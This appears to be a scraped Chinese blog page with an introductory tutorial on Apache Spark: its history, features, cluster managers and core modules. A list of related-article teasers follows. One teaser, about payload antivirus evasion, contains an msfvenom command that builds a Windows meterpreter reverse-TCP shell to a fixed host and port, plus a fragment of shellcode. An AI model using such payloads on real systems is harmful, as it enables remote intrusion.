【Spark】Spark基礎教程知識點

?

第 1 部分 Spark 基礎

Spark 概述

本章介紹 Spark 的一些基本認識.

?

Spark官方地址?

一:什么是 Spark

Spark 是一個快速(基于內存), 通用, 可擴展的集群計算引擎

并且 Spark 目前已經成為 Apache 最活躍的開源項目, 有超過 1000 個活躍的貢獻者.

歷史

2009 年,Spark 誕生于 UC Berkeley(加州大學伯克利分校, CAL) 的 AMP 實驗室, 項目采用 Scala 編程語言編寫.

2010 年, Spark 正式對外開源

2013 年 6 月, 進入 Apache 孵化器

2014 年, 成為 Apache 的頂級項目.

目前最新的版本是3.0.1

?

二:Spark 特點

1:快速

與 Hadoop 的 MapReduce 相比, Spark 基于內存的運算是 MapReduce 的 100 倍.基于硬盤的運算也要快 10 倍以上.

Spark 實現了高效的 DAG 執行引擎, 可以通過基于內存來高效處理數據流

2: 易用

Spark 支持 Scala, Java, Python, R 和 SQL 腳本, 并提供了超過 80 種高性能的算法, 非常容易創建并行 App

而且 Spark 支持交互式的 Python 和 Scala 的 shell, 這意味著可以非常方便地在這些 shell 中使用 Spark 集群來驗證解決問題的方法, 而不是像以前一樣 需要打包, 上傳集群, 驗證等. 這對于原型開發非常重要.

?

???????3:通用

Spark 結合了SQL, Streaming和復雜分析.

Spark 提供了大量的類庫, 包括 SQL 和 DataFrames, 機器學習(MLlib), 圖計算(GraphicX), 實時流處理(Spark Streaming) .

可以把這些類庫無縫的柔和在一個 App 中.

減少了開發和維護的人力成本以及部署平臺的物力成本.

?

???????4:可融合性

Spark 可以非常方便的與其他開源產品進行融合.

比如, Spark 可以使用 Hadoop 的 YARN 和 Appache Mesos 作為它的資源管理和調度器, 并且可以處理所有 Hadoop 支持的數據, 包括 HDFS, HBase等.

???????三:Spark 內置模塊介紹

?

1:集群管理器(Cluster Manager)

Spark 設計為可以高效地在一個計算節點到數千個計算節點之間伸縮計算。

為了實現這樣的要求,同時獲得最大靈活性,Spark 支持在各種集群管理器(Cluster Manager)上運行,目前 Spark 支持 3 種集群管理器:

1:Hadoop YARN(在國內使用最廣泛)

2:Apache Mesos(國內使用較少, 國外使用較多)

3:Standalone(Spark 自帶的資源調度器, 需要在集群中的每臺節點上配置 Spark)

?

???????2:SparkCore

實現了 Spark 的基本功能,包含任務調度、內存管理、錯誤恢復、與存儲系統交互等模塊。SparkCore 中還包含了對彈性分布式數據集(Resilient Distributed DataSet,簡稱RDD)的API定義。

?

???????3:?Spark SQL

是 Spark 用來操作結構化數據的程序包。通過SparkSql,我們可以使用 SQL或者Apache Hive 版本的 SQL 方言(HQL)來查詢數據。Spark SQL 支持多種數據源,比如 Hive 表、Parquet 以及 JSON 等。

?

???????4:?Spark Streaming

是 Spark 提供的對實時數據進行流式計算的組件。提供了用來操作數據流的 API,并且與 Spark Core 中的 RDD API 高度對應。

?

???????5:Spark MLlib

提供常見的機器學習 (ML) 功能的程序庫。包括分類、回歸、聚類、協同過濾等,還提供了模型評估、數據導入等額外的支持功能。

?

Spark 得到了眾多大數據公司的支持,這些公司包括 Hortonworks、IBM、Intel、Cloudera、MapR、Pivotal、百度、阿里、騰訊、京東、攜程、優酷土豆。

當前百度的 Spark 已應用于大搜索、直達號、百度大數據等業務;

阿里利用 GraphX 構建了大規模的圖計算和圖挖掘系統,實現了很多生產系統的推薦算法;

騰訊Spark集群達到 8000 臺的規模,是當前已知的世界上最大的 Spark 集群。

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/271261.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/271261.shtml
英文地址,請注明出處:http://en.pswp.cn/news/271261.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

關系數據庫理論:數據庫的六大范式知識筆記

1、數據庫范式的作用數據庫范式主要是為解決關系數據庫中數據冗余、更新異常、插入異常、刪除異常問題而引入的設計理念。簡單來說,數據庫范式可以避免數據冗余,減少數據庫的存儲空間,并且減輕維護數據完整性的成本。是關系數據庫核心的技術之…

python 生成payload_利用Python進行Payload分離免殺

缺點:編譯成exe以后體積過大實現:msf生成shellcode代碼:msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST192.168.3.60 LPORT3333 -f c將payload給copy下來,去除引號。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\…

ping不通docker_初識docker

前言大家好,我是jack xu,本篇是我在今日頭條的首秀,我的英文名來源于jack ma,馬云,所以大家也可以叫我徐云,即我希望像馬云一樣富有、成功,另外我名字中的杰與jack也是諧音關系。今天給大家帶來…

H5基礎標簽

一、字體標簽 1.text-indent:首行縮進 2.text-decoration:文本修飾(text-decoration:none;除去文字的下劃線;text-decoration:line-through;文字上加刪除線) 3.letter-spacing&#…

SQL語言基礎:數據庫語言概念介紹

1、概念介紹SQL(Structured Query Lanauage)結構化查詢語言是關系數據庫中最普遍使用的語言。主要包括查詢、數據操縱、數據定義、數據控制功能,是一種通用的、功能強大的關系數據庫的標準語言。2、SQL語言分類2.1 數據庫定義語言&#xff08…

configuration 命名空間_kubernetes30:monitoring命名空間處于Terminating狀態的處理方法...

刪除monitoring命名空間時總也無法徹底刪除,發現monitoring處于Terminating狀態,故有此文。kubectl get namespaces -o wide解決:嘗試使用force delete。kubectl delete namespace monitoring --force --grace-period0發現強制刪除沒有成功。…

SQL語言基礎:SQL語言概念知識筆記

1、SQL標準ANSI(美國國家標準機構)SQL對ANSI SQL進行修改后在1992年采用的標準SQL-92或SQL2SQL-99或SQL3標準從SQL2擴充而來,增加了對象關系特征和許多其他新的功能。最近的標準版本是SQL:20032、SQL的特點綜合統一:SQ…

重定向與轉發

使用重定向方法sendRedirect()將用戶重新定向到一個JSP頁面或另一個Servlet。 RequestDispatcher對象調用void forward(ServletRequest request,ServletResponse response) 方法可以將用戶對當前JSP頁面或Servlet的請求轉發給RequestDispatcher對象所指定的JSP頁面或Servlet。 …

ubuntu mysql 內存滿了_Ubuntu mysql可以把data防止到內存盤中

作者:李祥敬2010-03-04/17:57Ubuntu mysql對于電腦使用的玩家的常用軟件,然后我就學習及深入的研究Ubuntu mysql,在這里和大家一起探討Ubuntu mysql的使用方法,希望對大家有用。1、如果Ubuntu mysql的data數據很少,內存…

原型(Prototype)的場景是不支持循環依賴的

原型(Prototype)的場景是不支持循環依賴的,通常會走到AbstractBeanFactory類中下面的判斷,拋出異常。

網絡工程中,VLAN到底有什么作用?

什么是VLAN呢?VLAN(Virtual Local Area Network)即虛擬局域網,是將一個物理的LAN在邏輯上劃分成多個廣播域的通信技術。在IEEE802.1Internetworking委員會結束了對VLAN初期標準的修訂工作的時候。新出臺的標準進一步完善了VLAN的體…

java的decode_Java decode機試題

/**** java編寫encode方法和decode方法,機試題 請你用java,c,c* 中任何一種語言實現兩個函數encode()和decode(),分別實現對字符串的變換和復原。* 變換函數encode()順序考察以知字符串的字符,按以下規則逐組生成新字符…

hrjava項目原型html_Mockplus for Mac(原型設計工具)

Mockplus for Mac是Mac平臺上一款簡單、快速的原型設計工具,無需任何編程,不需要任何編程基礎知識,幫你快速使用Mockplus設計圖形。Mockplus封裝了近200個組件,提供3000個以上的圖標素材。做圖時,只需要把這些組件放入…

Leetcode 給定一個數組,給定一個數字。返回數組中可以相加得到指定數字的兩個索引

問題內容是:給定一個數組,給定一個數字。返回數組中可以相加得到指定數字的兩個索引。 比如:給定nums [2, 7, 11, 15], target 9 那么要返回 [0, 1],因為2 7 9 這道題的優解是,一次遍歷HashMap: 先去…

java 正則表達式 提取ip_java正則表達式提取地址中的ip和端口號

由于我需要用到java正則表達式提取地址中的ip和端口號,所以我就寫了一個demo,測試一下,下面是demopublic class Test0810_1 {public static void main(String[] args) {//通過控制板輸入想要輸入的地址,然后測試是否符合規則Scann…

SQL語言基礎:常用的數據查詢語句

1、創建表語法格式&#xff1a;creat table <表名> (<,列名><數據類型>[列級完整性約束條件]<,列名><數據類型>[列級完整性約束條件]...[,<表級完整性約束條件>]);列級完整性約束條件&#xff1a;主鍵、外鍵 、唯一 unique、檢查 、默認值…

兩個不同網段的局域網如何互通_不同網段之間如何通信?

計算機之前是如何實現互相通信的呢&#xff1f;正文首先&#xff0c;計算機之間通信人為設定一個準則&#xff0c;這個準則是什么呢&#xff1f;如果兩臺計算機在一個相同網段&#xff0c;不需要輔助設備(網關)的幫助&#xff0c;可以直接通信。如果兩臺計算機在不同網段&#…

Java是值傳遞還是引用傳遞?

Java是值傳遞&#xff1a; &#xff08;1&#xff09;基本類型作為參數傳遞時&#xff0c;是傳遞值的拷貝&#xff0c;無論你怎么改變這個拷貝&#xff0c;原值是不會改變的&#xff1b; &#xff08;2&#xff09;對象的引用作為參數傳遞時&#xff0c;是把對象在內存中的地址…

SpringCloud Gateway的組成結構

SpringCloud Gateway結構 SpringCloud Gateway的底層基于Netty&#xff0c;主要組成有Predicates&#xff08;謂詞或者斷言&#xff09;、Route&#xff08;路由&#xff09;、Filter&#xff08;過濾器&#xff09; 思維導圖----------SpringCloud Gateway的組成&#xff1a; …

java resource放入的文件沒有生成在classes中_快速部署版@開源在線考試系統一鍵生成各種題型試卷且實時判卷...

首先聲明此項目來自開源網&#xff0c;小編也是愛好者&#xff1b;閱讀本文之前相信已經閱讀過【開源在線考試系統一鍵生成各種題型試卷且可以實時判卷】開源在線考試系統一鍵生成各種題型試卷且可以實時判卷本文分享快速部署版jar包&#xff0c;原項目前后臺是單獨項目&#x…